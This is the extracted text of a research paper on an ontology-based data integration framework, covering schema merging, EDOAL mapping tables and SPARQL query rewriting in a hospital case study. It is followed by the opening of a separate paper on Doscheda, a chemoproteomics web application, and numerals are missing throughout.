alignment a (the mappings list), the global schema g and the local one l, the new global schema t is initially created, which is initially equal to g, and the empty mapping list ml that will contain the mappings between l and t elements. merging is performed by applying merge operators to each input mapping. next, the local schema classes and relations, not included in the global schema, are added to t . the new resulting schema is modified by deleting redundant relationships and performing refactoring operations. the framework has an internal data structure to track changes to the new global schema t . in the second step, given the changes produced and after deciding whether to validate or not, the real schema merging is performed. output of schema merging activity, besides to the new global schema t , according to the definition . , also consists of the mapping table mt , whose rows represent a eg element of the global schema g and columns represent the el ,el ,...,eln elements of the local schemas l that are mapped to eg. since it is possible to define complex mappings n:m, the mapping table will be a table whose rows represent an egi expression of an element of the global schema g and the columns represent the expressions eljk of the j-th element of the k-th local schema. a generic mt[i,j] element of the mapping table represents, in fact, a mapping m(id,egi,eljk,n,rel) between the expression of an element i-th of the global schema and an expression of an element j-th of the k-th local schema. mapping table in the mapping table, according with the definition . , rows represent elements of the global schema, and columns represent elements of the local schemes. elements are generic owl expressions and table shows the possible mappings in the mapping table: the framework, however, allows mappings to be defined in a generic way, without explicit reference to a global or local schema. for this reason, the framework must be configured by setting a parameter dir ={global,local} indicating the direction of the mappings in such a way as to support queries reformulation. if not specified, it is assumed that in the rows there are expressions referring to the global schema and in the columns fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping table. global schema g local schemas , ,...,n ce mapping ceg ⋃ i∈[ ,n]cei ope mapping opeg ⋃ i∈[ ,n]opei dpe mapping dpeg ⋃ i∈[ ,n]dpei the expressions referring to the local schemes. when it is necessary to insert a mapping in the opposite direction, it is inverted. the mapping table is represented using the edoal (http://alignapi.gforge.inria.fr/ edoal.html) language. for example, we consider the following mapping: m(hospital,infirmary,≡, . ,[(name,name)]) for the mapping m(hospital,infirmary), assuming to assign to the first schema the prefix src# and to the second schema the prefix trg#, the mapping representation for the property name will be as follows: <map > <cell > <entity > <edoal:property rdf:about="src#name"/> </entity > <entity > <edoal:property > <edoal:or rdf:parsetype =" collection"> <edoal:property > <edoal:and rdf:parsetype =" collection"> <edoal:property rdf:about="trg#name"/> <edoal:propertydomainrestriction > <edoal:class > <edoal:class rdf:about="trg#infirmary"/> </edoal:class > </edoal:propertydomainrestriction > </edoal:and > </edoal:property > </edoal:or> </edoal:property > </entity > <relation >=</relation > <measure rdf:datatype=’http ://www.w .org / / xmlschema#float ’> . </measure > </cell > </map > query processing the framework allows query execution by defining a query, posed over the global schema, through sparql (https://www.w .org/tr/rdf-sparql-query/). the query rewriting process (thiéblin et al., ) exploits correspondences :n between global and local schema elements, expressed in descriptive logic, and applies a set of transformation rules to such correspondences. inputs of query rewriting process are a sparql query and a mapping table mt (in edoal format) and generates a set of queries, also expressed in sparql. subsequently generated queries are transmitted to the acquisition subsystem for their evaluation, that is, to perform the local query processing task. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://alignapi.gforge.inria.fr/edoal.html http://alignapi.gforge.inria.fr/edoal.html https://www.w .org/tr/rdf-sparql-query/ http://dx.doi.org/ . /peerj-cs. global query processing query rewriting process is performed by rewriting the graph pattern of a sparql query, applying the transformation rules to each triple pattern in it. since a triple pattern can refer to data (for example, instance relationships) or schema (class and/or property relationships), or both, a pattern subdivision is performed based on the type. a triple pattern is a triple (subject,predicate,object), which can be classified as: • dtp (data triple pattern): if it is related to information concerning data and not the schema; • stp (schema triple pattern): if it is related to information concerning data and not the schema. the reformulation process (algorithm ) applies the three-step transformation rules. in the first step, the triple is rewritten by considering the specified mappings for the predicate part. in the second step are considered mappings for the object part, and finally for the subject part. sparql variables, constants, and rdf/rdfs/owl properties, which may appear in the subject, predicate, and object part of a triple, are not rewritten. as a result, the they will also appear in the rewritten query. algorithm sparql rewriting input: sparql query qin, mapping table mt output: sparql query qout : gpin ← graph pattern of qin : gpout ←gpin after replacing iris in filter, using : mappings mt : gpout ←triple pattern rewriting(gpout , mt , predicate) : gpout ←triple pattern rewriting(gpout , mt , object) : gpout ←triple pattern rewriting(gpout , mt , subject) : qout ←new query containing gpout transformation rules (thiéblin et al., ) are described by a set of functions of the type: dxy(t,µ)→tr ( ) sxy(t,µ)→tr ( ) where t is a dtp (in eq. ( )) or stp (in eq. ( )),µ is the mapping between es (source schema entity) and et (target schema entity) for the subject, predicate or object part of t, x ∈{s,p,o} denotes the part of the triple used by the function, y ∈{c,op,dp,∗} represents the type of x (a class, relation, property or any, respectively) and tr represents the transformation rule. a mapping µ is a generic element mt[i,j]=m(id,egi,eljk,n,rel) of the mapping table mt . although the mapping table allows managing : , :n, n: and n:m mappings, the query reformulation process does not consider n: and n:m mappings. functions eqs. ( ) and ( ) are used to rewrite each triple of the input graph pattern. output of global query processing is a set of queries, posed over the local ontologies, still expressed in sparql. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure first data source: (a) entity-relationship diagram and (b) local view. full-size doi: . /peerjcs. /fig- local query processing local query processing is the second activity of the mediation process. each reformulated query is still expressed in sparql and a second reformulation step is required for those data sources that use a language other than sparql to retrieve data. relational sources that the framework allows to integrate use sql to express a query. to perform query reformulation, a sparql engine is used, which uses query rewriting techniques and inference mechanisms: quest (rodriguez-muro, hardi & calvanese, ). query processing for xml data source is supported by a framework, integrated in the system, that allows query reformulation from sparql to xquery (https: //www.w .org/tr/xquery- /: sparql xquery (bikakis et al., ). case study in order to validate the proposed framework, a case study was conducted using three heterogeneous data sources (two relational data sources, and one semi-structured, specifically a spreadsheet) designed in different contexts, related to the health domain applications. as initial step the first source is acquired, which entity-relationship diagram and local view are shown in fig. . at this point its local view becomes the new virtual view. in this case the only steps that must be performed are those of source wrapping and annotation of the schema. the extraction of semantic information, through the schema annotation activity, is necessary as this information will be used to generate the mapping with the source schemes that will be acquired later. the output of the schema annotation activity is a set of annotations an , one for each element ei of the schema, where each annotation ani is a triple (toki,posi,sensei) composed by: • toki: the token of the element ei; • posi: the lexical category of the token toki; • sensei: the sense of the token toki for the lexical category posi, as output of the disambiguation process. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.w .org/tr/xquery- / https://www.w .org/tr/xquery- / http://dx.doi.org/ . /peerj-cs. table output of the schema annotation activity. class token sense hospital hospital sense# : a health facility where patients receive treatment professional professional sense# : an athlete who plays for pay supplier supplier sense# : someone whose business is to supply a particular service or commodity instrumentation instrumentation sense# : an artifact (or system of artifacts) that is instrumental in accomplishing some end figure second data source: (a) entity-relationship diagram and (b) local view. full-size doi: . /peerjcs. /fig- in table is shown an extracted of the output of the schema annotation activity performed over the first local view. then, the second source is acquired, which entity-relationship diagram and local view are shown in fig. . as in the first integration step, the source wrapping and schema annotation activities are performed. subsequently, the schema matching activity is performed. to this aim, the following thresholds setting is adopted: α≡ = . αv/w= . αidk = . β = . once the schema matching is completed the mappings are obtained. some examples are: m(hospital,hospital,≡, ,[(address,address, ),(name,name, ),(code,hosp_code, . )]) m(oerating_room,surgery,w, ,[(code,surgery_code, . ), (numtables,numbertables, . )]) fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. m(supplier,person,v, ,[(name,name, ),(address,address, ), (code,code, ),(city,citybirth, . )]) m(office,lab,idk, ,[(type,typelab, . ),(name,namelab, . ), (code,code_lab, . )]) during the validation step of the mappings, the user should to delete the mapping m(office,lab) and replace the semantic relationship of the mapping m(operating_room,surgery) to (≡), as that relationship, in the surgery class of the first scheme, refers to a room in which a doctor can be consulted, while in the second scheme to an operating room. he also should to delete the correspondence between properties city and citybirth in the mapping m(supplier,person). the m(office,lab) mapping is returned because the two classes match all properties and, as a result, the contextual similarity measure is . this mapping must be deleted otherwise during the schema merging activity a wrong association relationship will be created between the two classes. the αidk threshold was chosen at . to highlight this observation. if association relationships have no reason to be created, the schema matching activity should be performed with a high value for the αidk threshold. the threshold value αv/w was chosen equal to . because, if it was lower, the mapping m(ward,person) would be added a semantic relationship of hyponymy, but this mapping is wrong. in the set of mappings should also to appear the mapping :n m(hospital,{hospital,statistics}) but is not returned because of the threshold αidk high. to take into account the representation of the hospital concept through the hospital and statistics classes, there are therefore two alternatives. the first one is to keep the threshold value of αidk high and insert manually the mapping. the second one is to lower the threshold and eliminate the other mappings in which there is a idk relationship, except the mapping except the mapping mentioned above. however, the following mapping is also obtained: m(hospital,{hospital,statistics})=[m(hospital,hospital),m(hospital,statistics)]=[ m(hospital,hospital,≡, ,[ (address,address, ), (name,name, ), (code, hosp_code, . )]), m(hospital,statistics,idk, . ,[ (numadmission,numberadmission, . ), (numdead,numberdead, . ), (numoperation,numberoperation, . )])] the global view is initially the local view of the first source. at this point the schema merging activity is performed. the new global view is shown in fig. . as an example, considering the mapping m(hospital,{hospital,statistics}). assuming the prefix merged# to the global view, the prefix hospital_ # to the first local view and hospital_ # to the second local view, once the schema merging activity is performed, the representation of the mapping m(hospital,{hospital,statistics}), will be as follows: fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure global view after the second source integration. full-size doi: . /peerjcs. /fig- <map > <entity > <edoal:class rdf:about=" merged#hospital"/> </entity > <entity > <edoal:class > <edoal:or rdf:parsetype =" collection"> <edoal:class rdf:about=" hospital_ #hospital"/> <edoal:class rdf:about=" hospital_ #hospital"/> </edoal:or> </edoal:class > </entity > <relation >=</relation > </map > <map > <entity > <edoal:class rdf:about=" merged#statistics "/> </entity > <entity > <edoal:class > <edoal:or rdf:parsetype =" collection"> <edoal:class rdf:about=" hospital_ #statistics "/> </edoal:or> </edoal:class > </entity > <relation >=</relation > </map > in a similar way the correspondences for the other elements of the schemes are defined. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure third data source: (a) part of spreadsheet and (b) part of spreadsheet . full-size doi: . /peerjcs. /fig- the third source acquired is a composed of different spreadsheets. some parts of the spreadsheets are shown in fig. . an extracted of the local view of the third source is shown in fig. . after source wrapping and schema annotation activities are performed, the schema matching activity is performed using the following threshold values: α≡ = . αv/w = . αidk = . β = . the threshold value of the contextual similarity β is equal to . because, although there are classes designed with different attributes, they represent the same concept of the real world and for which, therefore, the mappings must be returned. this situation is managed by lowering the value of β but not those of αv/w and α≡. the high value of αidk is meant to filter almost all idk mappings, since they are not correct. it has been increased through tuning activities, in order to filter all those concepts with an empty set of mappings between their properties. in this way we can provide to the user just few mappings to be validated. an example of returned mappings to the user, are the following: m(hospital,hospital,≡, ,[(code,hospital_code . ),(name,hospitalname, . ), (address,street_address, . ),(city,city, )]) fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure local view of the third source. full-size doi: . /peerjcs. /fig- m(hospital,rehabilitation_hospital,≡, . ,[(code,hospital_code, . ), (name,hospitalname, . ), (address,street_address, . ),(city,city, )]) m(hospital,children_specialtyhospital,≡, . ,[(code,hospital_code, . ), (name,hospitalname, . ), (address,street_address, . ),(city,city, )]) m(hospital,psychiatric_hospital,≡, . ,[(code,hospital_code, . ), (name,hospitalname, . ),(address,street_address, . ),(city,city, )]) m(person,contact_person,w, . ,[(address,email_address, . ),(name,name, )]) m(person,administrator,w, ,[(address,email_address, . ),(name,name, )]) fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure new global view after the third data source is integrated. full-size doi: . /peerjcs. /fig- during the validation step of the mappings, the user should to insert a idk mapping between the hospital and specialized_hospital_characteristics classes, delete the correspondences between the address and email_address properties in the mapping m(person,administrator) and replace the semantic relationship of the mapping m(person,contact_person) to idk. he also should to insert a mapping ≡ between the operating _room and surgery classes, as they both refer to an operating room. besides, he should to replace the semantic relationship of the mappings m(hospital,rehabilitation_hospital), m(hospital,psychiatric_hospital) and m(hospital,children_specialtyhospital) to w. since the user has knowledge about the application domain, he is able to recognize which mappings must to be deleted or not. once the schema matching activity has been completed, the next step is the schema merging activity. the new global view, in which all attributes are not shown, is shown in fig. . after the third source is integrated, a lot of mappings are included, but many of them, as well as an example of the mapping table, are removed from the example, in order not to create confusion in the reader in understanding the full integration process. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. query processing in the query processing activity the user has the possibility to run a query over the global virtual view, through sparql (https://www.w .org/tr/rdf-sparql-query/), as mentioned in ‘query processing’. we provide a short example of the query rewriting process, considering three queries. uris used are merged# for the global virtual view and hospital_ #, hospital_ # e hospital_ #, respectively, for the first, second and third source. the first query is: ’’return all instances of the hospital class, with the corresponding names’’: select ?x ?y where {?x rdf:type merged#hospital. ?x merged#name ?y} in this case, in the global view are merged hospital_ #, hospital_ # and hospital_ # , respectively, from the first, second and third local views. the mediation subsystem translates the above query in three queries, one for each of the integrated data sources. the reformulated queries are the followings: select ?x ?y where { ?x rdf:type hospital_ #hospital. ?x hospital_ #name ?y ; rdf:type hospital_ #hospital } select ?x ?y where { ?x rdf:type hospital_ #hospital. ?x hospital_ #name ?y ; rdf:type hospital_ #hospital } select ?x ?y where { ?x rdf:type hospital_ #hospital. ?x hospital_ #hospitalname ?y ; rdf:type hospital_ #hospital } the second query is: ‘‘return all instances of the person class, with the corresponding names’’: select ?x ?name where { ?x rdf:type merged#person. ?x merged#name ?name} the reformulated queries are the followings: select ?x ?name where { ?x rdf:type hospital_ #professional { ?x hospital_ #name ?name ; rdf:type hospital_ #supplier} union { ?x hospital_ #name ?name ; rdf:type hospital_ #professional} } select ?x ?name where { ?x rdf:type hospital_ #person. ?x hospital_ #name ?name ; rdf:type hospital_ #person } fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/tr/rdf-sparql-query/ http://dx.doi.org/ . /peerj-cs. table size of the local views. first source second source third source number of classes number of relations number of properties number of instances select ?x ?name where { ?x rdf:type hospital_ #administrator. ?x hospital_ #name ?name ; rdf:type hospital_ #administrator } the third query is: ‘‘return all instances of the person class living in benevento’’: select ?person ?city where { ?person rdf:type merged#person. ?person merged#address ?city filter regex(?city , "benevento", "i") } the reformulated queries are the followings: select ?person ?city where { { ?person rdf:type hospital_ #professional { ?person hospital_ #address ?city ; rdf:type hospital_ #professional} union { ?person hospital_ #address ?city ; rdf:type hospital_ #hospital} union { ?person hospital_ #address ?city ; rdf:type hospital_ #supplier} } filter regex(?city , "benevento", "i") } select ?person ?city where { { ?person rdf:type hospital_ #person { ?person hospital_ #address ?city ; rdf:type hospital_ #person} union { ?person hospital_ #address ?city ; rdf:type hospital_ #hospital} } filter regex(?city , "benevento", "i") } select ?person ?city where { ?person rdf:type hospital_ #administrator ; hospital_ #street_address ?city ; rdf:type hospital_ #hospital filter regex(?city , "benevento", "i") } if an element does not have a correspondence with an element of the some local view, the translated query for that view is the same of the global view. each wrapper will return an empty result when the query will be performed. analysis we report time overheads in each of the phases of the approach proposed. in the case study presented is shown the application of the approach rather than optimizations of the performance of the activities of the integration process. for this reason, as shown in table , the size of the data sources, in terms of the number of the elements of the structures that represent them, is not high. nevertheless, the developed software prototype shows good fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table time overheads of the proposed approach. activity time (ms) source wrapping (first source) source wrapping (second source) source wrapping (third source) schema matching (first and second views) schema matching (global and third views) schema merging (first and second views) schema merging (global and third views) total time of the integration process , table time overheads of the query processing activity. first query second query third query query rewriting time (ms) query execution time (ms) , , , performance in terms of the execution time of the proposed approach phases, as shown in table . the acquisition of excel data sources has a longer execution time than acquiring relational data sources. this is because we need to consider the access times to the file and the identification of the tables that will constitute the elements of the local view. the low execution times of the schema matching and merging activities are relatively low, as there are optimizations of the algorithms and data structures used. to the total execution time of the full integration process, the time necessary to validate the mappings, which depends on the user, and the setup time needed for the schema matching activity (about s) must be added. during the setup of the schema matching activity, performed only once, the modules needed for the annotation activity of the local views are loaded. table , instead, shows the execution times of the query processing activity. the transformation of the queries has low execution times because the prototype is supported by the mapping table. with the mapping table we can reduce the time for searching an element (class, property or relationship) inside the local view that should be replaced in the query. this is not true when the query is really executed, because the time of execution depends on the specific technology of a data source. conclusions the purpose of this paper is to allow unified access to heterogeneous and independent source data, offering a data integration approach that addresses all the issues discussed. the architecture adopted is that of mediation systems, which create a virtual view of the real data and allow to external applications to access data through that view in a transparent manner. transparency is guaranteed by translating queries posed over the virtual view into queries that are directly executable from local sources. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the proposed approach allows unified access to heterogeneous sources through the following activities: • source wrapping: the initial activity is the construction of an ontology for each source you want to integrate, whose structure is subsequently refined by using information extraction techniques to improve the quality of ontology. • schema matching: ontologies are then put in a matching process in order to automatically search mappings between the elements of the structures, using both syntax-based and semantic-based techniques. mappings are identified by combining both semantic and contextual characteristics of each element. these mappings are then validated and, if necessary, modified by the user. • schema merging: based on the generated mappings, a global ontology is created which is the virtual view of the system. • query reformulation: at this stage, a query posed over the virtual view is reformulated into a set of queries directly executable by local sources. the reformulation task is performed automatically, generating an execution plan of the reformulated queries, with the possibility for the user to modify each single query. overall, the approach is semi-automatic, but compared to existing systems, the user’s effort is minimized as he only intervenes in the matching configuration activity, by setting the threshold values for the mappings generation, and mappings validation. both simple ( : ) and complex mappings ( :n, n: and n:m) are generated. the outlined approach is supported by a specially designed and developed software system. the system provides a first level of abstraction of the activities and components involved in their execution and a second level of component specialization. although the design of the system is aimed at covering all aspects of data integration described so far, implementation has some limitations. in particular, the acquisition of unstructured sources is not yet contemplated in development and the data reconciliation process requires the development of appropriate components. except for such activities, integration and mediation processes are fully supported by the system. research activities that will be carried out in the future will have the goal of overcoming the limitations shown and consolidating, at the same time, the part of the system developed so far. in particular, accurate experimentation is required for validating the proposed approach, for ensuring high quality of mappings and local and global views, for optimizing the mediation process. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • giuseppe fusco and lerina aversano conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available at github: https://github.com/gppfusco/dataintegrationframework. references arens y, chee cy, hsu c-n, knoblock ca. . retrieving and integrating data from multiple information sources. international journal of intelligent and cooperative information systems ( ): – doi . /s . arens y, hsu c-n, knoblock ca. . query processing in the sims information mediator. advanced planning technology : – . beneventano d, bergamaschi s. . the momis methodology for integrating heterogeneous data sources. in: building the information society. boston: springer, – . bikakis n, gioldasis n, tsinaraki c, christodoulakis s. . querying xml data with sparql. in: international conference on database and expert systems applications. boston, ma: springer, – . calvanese d, lembo d, lenzerini m. . survey on methods for query rewriting and query answering using views. in: integrazione, warehousing e mining di sorgenti eterogenee. – . chawathe s, garcia-molina h, hammer j, ireland k, papakonstantinou y, ullman j, widom j. . the tsimmis project: integration of heterogenous information sources. in: information processing society of japan (ipsj ), october . tokyo, japan. chiticariu l, kolaitis pg, popa l. . interactive generation of integrated schemas. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . civili c, console m, de giacomo g, lembo d, lenzerini m, lepore l, mancini r, poggi a, rosati r, ruzzi m. . mastro studio: managing ontology-based data access applications. proceedings of the vldb endowment ( ): – doi . / . . fong j, pang f, fong a, wong d. . schema integration for object-relational databases with data verification. in: proceedings of the international computer symposium workshop on software engineering and database systems, taiwan. – . ghawi r, cullot n. . database-to-ontology mapping generation for semantic interoperability. in: vdbl’ conference, vldb endowment acm. new york: acm, – . fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/gppfusco/dataintegrationframework http://dx.doi.org/ . /s http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. ghawi r, cullot n. . building ontologies from xml data sources. in: database and expert systems application, . dexa’ . th international workshop on. ieee, – . goh ch, bressan s, madnick s, siegel m. . context interchange: new features and formalisms for the intelligent integration of information. acm transactions on information systems (tois) ( ): – doi . / . . hull r, king r (eds.) . reference architecture for the intelligent integration of infor- mation. available at http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf . katsis y, papakonstantinou y. . view-based data integration. in: encyclopedia of database systems. boston: springer, – . kong h, hwang m, kim p. . a new methodology for merging the heterogeneous domain ontologies based on the wordnet. in: international conference on next generation web services practices, . piscataway: ieee, . lee m, ling t. . a methodology for structural conflict resolution in the integration of entity-relationship schemas. knowledge and information systems ( ): – doi . /s - - -x. lenzerini m. . data integration: a theoretical perspective. in: proceedings of the twenty-first acm sigmod-sigact-sigart symposium on principles of database systems. pods ’ . new york: acm, – doi . / . . mena e, kashyap v, illarramendi a, sheth ap. a. managing multiple information sources through ontologies: relationship between vocabulary heterogeneity and loss of information. in: ceur workshop proceedings, . dayton: kno.e.sis publications, – . mena e, kashyap v, sheth a, illarramendi a. b. observer: an approach for query processing in global information systems based on interoperation across pre-existing ontologies. in: proceedings of the first ifcis international conference on cooperative information systems. piscataway: ieee, – . orsini m, beneventano d, cruz if, direttore ii. . query management in data integration systems: the momis approach. phd thesis, international doctorate school in information and communication technologies of the university of modena and reggio emilia. preece a, hui k, gray p. . kraft: supporting virtual organisations through knowledge fusion. in: artificial intelligence for electronic commerce: papers from the aaai- workshop. – . preece a, hui k-y, gray a, marti p, bench-capon t, jones d, cui z. . the kraft architecture for knowledge fusion and transformation. knowledge-based systems ( ): – doi . /s - ( ) - . rodriguez-muro m, hardi j, calvanese d. . quest: efficient sparql-to-sql for rdf and owl. in: proceedings of the th international conference on posters demonstrations track-volume, . – available at http://ceur-ws.org/ . fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf http://csce.uark.edu/~cwt/docs/papers/ - / - --darpa% intelligent% integration% of% information% reference% architecture% (i )% v % draft.pdf http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / . http://dx.doi.org/ . /s - ( ) - http://ceur-ws.org/ http://dx.doi.org/ . /peerj-cs. shvaiko p, euzenat j. . a survey of schema-based matching approaches. in: journal on data semantics iv. boston: springer, – . thiéblin É, amarger f, haemmerlé o, hernandez n, trojahn c. . rewriting select sparql queries from : n complex correspondences. ontology matching . wache h, voegele t, visser u, stuckenschmidt h, schuster g, neumann h, hübner s. . ontology-based integration of information-a survey of existing approaches. in: ijcai- workshop: ontologies and information sharing, vol. . – . xiao g, calvanese d, kontchakov r, lembo d, poggi a, rosati r, zakharyaschev m. . ontology-based data access: a survey. in: proceedings of the twenty-seventh international joint conference on artificial intelligence. international joint conferences on artificial intelligence organization, . xu l, embley dw. . combining the best of global-as-view and local-as-view for data integration. in: ista, vol. . – . fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. submitted march accepted july published august corresponding author piero ricchiuto, ricchiuto.piero@gmail.com academic editor robert winkler additional information and declarations can be found on page doi . /peerj-cs. copyright contrino et al. distributed under creative commons cc-by . open access doscheda: a web application for interactive chemoproteomics data analysis bruno contrino , eric miele , ronald tomlinson , m. paola castaldi and piero ricchiuto department of quantitative biology, discovery sciences, astrazeneca, cambridge, united kingdom department of chemical biology, discovery biology, discovery sciences, astrazeneca, waltham, ma, united states of america abstract background. mass spectrometry (ms) based chemoproteomics has recently become a main tool to identify and quantify cellular target protein interactions with ligands/drugs in drug discovery. the complexity associated with these new types of data requires scientists with a limited computational background to perform systematic data quality controls as well as to visualize the results derived from the analysis to enable rapid decision making. to date, there are no readily accessible platforms specifically designed for chemoproteomics data analysis. results. we developed a shiny-based web application named doscheda (down stream chemoproteomics data analysis) to assess the quality of chemoproteomics experiments, to filter peptide intensities based on linear correlations between replicates, and to perform statistical analysis based on the experimental design. in order to increase its accessibility, doscheda is designed to be used with minimal user input and it does not require programming knowledge. typical inputs can be protein fold changes or peptide intensities obtained from proteome discover, maxquant or other similar software. doscheda aggregates results from bioinformatics analyses performed on the input dataset into a dynamic interface, it encompasses interactive graphics and enables customized output reports. conclusions. doscheda is implemented entirely in r language. it can be launched by any system with r installed, including windows, mac os and linux distributions. doscheda is hosted on a shiny-server at https://doscheda.shinyapps.io/doscheda and is also available as a bioconductor package (http://www.bioconductor.org/). subjects bioinformatics keywords quantitative chemoproteomics, statistical models, web interface, shiny, tmt, itraq, proteomics, quantitative chemical biology, drug dose-response, protein drug profiling background many drugs fail in the clinic for lack of efficacy or for toxicity and as such, some of the most important steps in drug discovery are evaluation of target engagement and off-targets liabilities. next generation sequencing (ngs) and mass spectrometry proteomics-based drug discovery (jones & neubert, ) approaches offer unique how to cite this article contrino et al. ( ), doscheda: a web application for interactive chemoproteomics data analysis. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:ricchiuto.piero@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doscheda.shinyapps.io/doscheda http://www.bioconductor.org/ http://dx.doi.org/ . /peerj-cs. opportunities to deeply characterize drug-targets biology and pharmaceutical agents (bantscheff et al., ; bantscheff et al., ). quantitative chemical proteomics (bantscheff & drewes, ) and ms-cellular thermal shift assay (ms-cetsa) (martinez & nordlund, ) have been recently deployed in drug discovery to aid target deconvolution in the context of phenotypic screens, to elucidate drugs’ mechanisms of action and evaluation of drug repurposing (schirle, bantscheff & kuster, ). a generous number of computational tools has been developed for ms-spectral analysis and protein quantification, such as proteome discoverer (https://www.thermofisher.com/), maxquant (cox & mann, ) or peaks (http://www .bioinfor.com) for de novo peptide sequencing. however, the increasing variety of ms based approaches for drug target deconvolution can produce data that need dedicated downstream analysis platforms for facilitating the biological interpretation of results. here, we focus on quantitative chemoproteomics used to determine protein interaction profiles of small molecules from whole cell or tissue lysates (manning, ). chemoproteomics includes reverse competition-based experiments that, in combination with quantitative ms (e.g., tandem mass tags (tmt) or isobaric tag for relative quantification (itraq)), are used for rank-ordering of small molecule-protein interactions by binding affinity (bantscheff & drewes, ). although several comprehensive analysis pipelines, such as ocap (wang, yang & yang, ), prosightpc (http://proteinaceous.net/software/), toppic (kou, xun & liu, ), msstats (choi et al., ), skyline (maclean et al., ), maxquant & perseus (tyanova et al., ) and dapar & prostar (wieczorek et al., ), have been developed for the downstream data analysis, to the best of our knowledge there are no tools specifically designed to facilitate chemoproteomics data analysis for scientists with a limited computational background and available as a public server application. based on this, we have developed a shiny-based web application named doscheda (down stream chemoproteomics data analysis), which includes: (i) an open-source code available on bioconductor for r-users; (ii) a user-friendly graphical user interface (gui) with no programming knowledge required (iii) a traffic-light system to enable the user to rapidly identify and address data incongruences; (iv) an os-independent implementation which generates a comprehensive final report in addition to analysis results; (v) a flexible data-input routine which enables the user to import different file types (.txt, .xlsx, .csv), typically exported from ms-software such as proteome discover or maxquant; (vi) the crapome flagged proteins based on the contaminant repository database (mellacheruvu et al., ) doscheda addresses the need to perform fit for purpose statistical analysis of chemoproteomics experiments, including linear and non-linear models, to provide a ranking of the protein(s) most competed by the investigational compound (the competitor) as well as to generate standardized results that can be further used for downstream analysis or for different experiment comparisons. contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.thermofisher.com/ http://www .bioinfor.com http://proteinaceous.net/software/ http://dx.doi.org/ . /peerj-cs. table required inputs for doscheda. input data from pd . input data not from pd . peptide intensities peptide qvality score, protein accessions, peptide names, intensities peptide qvality score, protein accessions, peptide names, intensities fold changes protein fold changes protein accessions, protein fold changes, unique peptides log-fold changes protein log-fold changes protein accessions, protein log-fold changes, unique peptides implementation doscheda is implemented using r (r core team, ), an open-source software for statistical computing and coded in shiny (chang et al., ). doscheda processes the data based on a series of pipelines developed and integrated into the application. the user selects what pipeline to be executed based on the experimental design and data input. data input the application is designed to take three different types of data: . peptide intensities. these are obtained from proteome discoverer, maxquant or similar software. the same procedure applied in proteome discoverer . has been implemented in doscheda for summing the reporter ions to protein relative quantification. the protein fold changes [ctrl]/[treated] are then converted to log scale and then passed into the pipeline. . fold changes. these are the protein fold changes, [ctrl]/[treated]. . log fold changes. these are the log protein fold changes. doscheda has been optimized for proteome discoverer . (pd . ), but it can also use data from other software given that the input file contains specific columns as described in table . statistical analyses the experimental design as shown in table will determine the type of analysis that can be performed in doscheda. the standard pipeline utilizes a linear model with a quadratic form f (x)=a +a x+a x where a is the intercept, a the slope and a the quadratic coefficient. this pipeline is suitable for experimental designs with less than channels ( -plex) and more than replicate (table ). increasing free drug concentrations and generation of a dose-response relationship with the protein target(s) provides information about specific drug-target interactions. the linear model analysis implemented in doscheda by using the limma r package (smyth, ) will identify proteins with a significant p value (slope, intercept, quadratic) as the protein drug-target(s). alternatively, in cases where biological input material is not a limiting factor, chemoproteomics experiments consist of a full-scale dose-response, in which or more contrino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table type of analysis performed in doscheda. replicate more than replicate less than channels not enough data linear model or more channels sigmoidal linear model concentrations are tested (e.g., -plex or -plex). in 